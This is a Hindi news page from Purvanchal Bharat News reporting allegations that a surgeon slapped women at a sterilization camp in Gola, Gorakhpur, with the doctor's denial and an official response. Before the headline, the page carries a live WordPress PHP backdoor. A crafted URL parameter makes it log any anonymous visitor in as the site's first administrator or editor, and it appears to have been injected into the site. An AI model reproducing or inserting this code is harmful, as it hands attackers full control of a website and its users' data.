// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); गोला में नसबंदी शिविर में चिकित्सक द्वारा महिलाओं को थप्पड़ मारने का आरोप,हंगामा - Purvanchal Bharat News
Connect with us

गोरखपुर ग्रामीण

गोला में नसबंदी शिविर में चिकित्सक द्वारा महिलाओं को थप्पड़ मारने का आरोप,हंगामा

Published

on

गोरखपुर।
गोला सामुदायिक स्वास्थ्य केंद्र पर शनिवार को आयोजित महिला नसबंदी ऑपरेशन शिविर में 18 महिलाओं के नसबंदी ऑपरेशन कराए गए। लेकिन नसबंदी ऑपरेशन के बाद वार्ड में पहुंची महिलाओं ने चिकित्सक पर थप्पड़ मारने का आरोप लगाया। तो चिकित्सक के दुर्व्यहार से माहौल गरम हो गया।और परिजन हंगामा करने लगे। किसी तरह लोगों ने समझा बुझाकर परिजनों को शांत कराया। लेकिन परिजन आरोपी डाक्टर पर कार्रवाई की मांग पर अड़े रहे। 
मिली जानकारी के अनुसार शनिवार को सीएचसी पर महिला नसबंदी शिविर का आयोजन किया गया। सुबह से ही अस्पताल परिसर में नसबंदी ऑपरेशन कराने पहुंची महिलाओं ने परिजनों व छोटे बच्चों के साथ डेरा डाल दिया था। शिविर में 23 महिलाओं का नसंबदी के लिए पंजीकरण हुआ था। महिलाओं के ऑपरेशन से पूर्व कोविड, एचआईवी, यूरिन, रक्त आदि की जांच की गई। और फिर चिकित्सकीय टीम ने ओटी में ऑपरेशन शुरू किया। और नसबंदी ऑपरेशन के बाद वार्ड में पहुंची हबरूस की ज्योति चंद, बेलपार पाठक की आशा देवी तथा पाली की खशबू समेत कई महिलाओं ने चिकित्सक पर थप्पड़ मारने के साथ दुर्व्यवहार करने का आरोप लगाया। महिलाओं के गाल पर थप्पड़ का निशान देख परिजन भड़क उठे। और हंगामा करने लगे। हंगामा बढता देख चिकित्सक ने 18 महिलाओं के नसबंदी के बाद ही ऑपरेशन बंद कर दिया। और अन्य को वापस कर दिया। इस दौरान चिकित्सक की बड़ी लापरवाही सामने आई। उन्होने जांच में प्रिगनेंसी रिपोर्ट पाजिटिव पाए जाने वाली बेलपार पाठक की आशा देवी का नसबंदी तो कर दिया था। लेकिन डीएनसी छोड़ दिया। जिसको लेकर महिला काफी परेशान रही पर आपरेशन करने वाले चिकित्सक ने एक ना सुनी।  हबरूस की ज्योति चंद के गाल पर उभरे पांच उंगलियों के निशान देखने के बाद, उनके परिजन आरोपी चिकित्सक पर कार्रवाई की मांग पर अड़े रहे। तीन बजे नसबंदी शिविर के समापन के बाद महिलाओं को 1400 रुपए प्रोत्साहन राशि सहित आवाश्यक  नि:शुल्क दवाएं देकर डिस्चार्ज किया गया। महिलाओं के नसबंदी ऑपरेशन में सर्जन डा विरेंद्र कुमार, स्टाफ नर्स व स्वास्थ्य कर्मचारियों समेत आशा कार्यकर्ता मौजूद रही। 
इस संबंध में महिलाओं का नसबंदी ऑपरेशन करने वाले चिकित्सक डा विरेंद्र कुमार ने महिलाओं के आरोप को निराधार बताया। तथा कहा कि आपरेशन के दौरान चिरा लगाने के बाद जो महिला काफी हो हल्ला व चिल्ला रही थी। दाई उनके गाल को सहला रही थी। वही निशान उन लोगों के गाल पर उभरा होगा। 

डा योगेंद्र नाथ सिंह, चिकित्सा अधीक्षक, सीएचसी-गोला का कहना है कि-
महिलाओं से दुर्व्यवहार की शिकायत मिली है। ऐसा नही करना चाहिए। लेकिन ओटी के अंदर की शिकायत की जांच के बाद ही कुछ कहा जा सकता है। मामले की जांच के बाद शिकायत सही पाए जाने पर उच्चाधिकारियों के पास रिपोर्ट प्रेषित की जाएगी।

जानकारी के अनुसार
गोला सीएचसी पर तैनात डाॅ विरेन्द्र कुमार जिले के उन पांच सर्जनो में से एक हैं जिन्हें नसबंदी की सर्जरी करने के लिये विशेष ट्रेनिंग दी गयी है। इन्हें गोला सहित गगहा ,कौड़ीराम, बांसगांव, बडहलगंज सीएचसी पर नसबंदी करने की जिम्मेदारी दी गयी है। इनकी मूल तैनाती गोला है। अलग अलग सीएचसी के दिनों को छोड़कर अन्य सभी दिन इनको गोला सीएचसी पर ही रहना है लेकिन शिविर के दिनों को छोड़कर यह कभी अस्पताल पर आने की जरूरत नहीं समझते।

Share this with your friends:
Continue Reading
Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

टॉप न्यूज़

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

Plastic Banknotes news
ताज़ा ख़बर1 month ago

Plastic Banknotes: भारत में जल्द आ सकते हैं प्लास्टिक के नोट, RBI कर रहा तैयारी; जानिए क्या होंगे फायदे

lucknow women hanging
ताज़ा ख़बर1 month ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण1 month ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश2 months ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

पीपीगंज गैस न्यूज़
उत्तर प्रदेश2 months ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर शहर2 months ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

बिजली तार की चपेट में आने से 3 भैंसों की मौत
गोरखपुर ग्रामीण1 month ago

गोरखपुर में टूटे बिजली तार की चपेट में आने से 3 भैंसों की मौत, पशुपालकों ने मांगा मुआवजा

arjun news sikariganj
गोरखपुर ग्रामीण2 months ago

सिकरीगंज में पिकअप-बाइक की आमने-सामने भिड़ंत, युवक की मौत

ताज़ा ख़बर1 month ago

रसोई गैस फिर महंगी, घरेलू LPG सिलेंडर के दाम में 29 रुपये का इजाफा; दिल्ली में अब 942 रुपये होगी कीमत

ताज़ा ख़बर2 months ago

दिल्ली समेत उत्तर-पश्चिम भारत में मौसम फिर बदलेगा, IMD का आंधी-बारिश और तेज हवाओं का अलर्ट

गोरखपुर शहर2 months ago

गोरखपुर विश्वविद्यालय में पेड़ों की कटाई पर विवाद, छात्रों ने लगाए गंभीर आरोप

पीपीगंज गैस न्यूज़
उत्तर प्रदेश2 months ago

पीपीगंज के कोल्हुआ गांव में गैस वितरण पर उठे सवाल, उपभोक्ताओं ने लगाया कम गैस और ज्यादा वसूली का आरोप

गोरखपुर में भीषण गर्मी
उत्तर प्रदेश2 months ago

गोरखपुर में भीषण गर्मी का कहर, दोपहर में 41°C पहुंचा तापमान; 28 मई से राहत के संकेत

lucknow women hanging
ताज़ा ख़बर1 month ago

लखनऊ में 25 वर्षीय विवाहिता का शव फंदे से लटका मिला, मायके पक्ष ने दहेज हत्या का लगाया आरोप

ताज़ा ख़बर2 months ago

शपथ लेते ही एक्शन में आए CM शुभेंदु अधिकारी, बंगाल के मुख्य सचिव और DGP से की अहम बैठक

Advertisement

Trending

free counter

हमारे बारे में-

पूर्वांचल भारत न्यूज एक रजिस्टर्ड न्यूज पोर्टल है ।
इसका उद्देश्य पूर्वांचल भारत के साथ ही देश दुनियां की खबरों व जानकारियों को हमारे दर्शकों को रोचक अंदाज में पहुंचना है। युवाओं को रोजगार सम्बन्धित जानकारी के साथ ही हर वर्ग की समस्या को हम उठा सकें यही हमारी प्राथमिकता होगी। इसके अलावा सांस्कृतिक, ऐतिहासिक और जनसमस्याओं से जुड़े समाचारों पर भी हमारा विशेष ध्यान होता है ।


प्रबन्धक / निदेशक:

जे. समरजीत जैसवार

प्रधान सम्पादक :

आदित्य धनराज

सम्पादक : अजय कुमार 

सलाहकार सम्पादक : जे०पी० 

सलाहकार सम्पादक : ब्रिजेन्द्र सिंह 

उपसम्पादक : एस.के. मिश्रा

उपसम्पादक : कमलेश यादव

उपसम्पादक : धीरेन्द्र कुमार

उपसम्पादक : नीतू यादव

सम्पादकीय :  मनीष कुमार

विज्ञापन और प्रसार प्रबन्धक: आदित्य धनराज

Our Visitor

041266
Total views : 48211


प्रधान कार्यालय :

कूड़ाघाट, निकट एम्स हॉस्पिटल मोहद्दीपुर, 

गोरखपुर, उo प्रo । पिन-273008

सम्पादकीय कार्यालय :

राम जानकी मार्ग, उरुवा बाजार, गोरखपुर
पिन-273407

Copyright © 2021. Powered by “PURVANCHAL BHARAT NEWS”

You cannot copy content of this page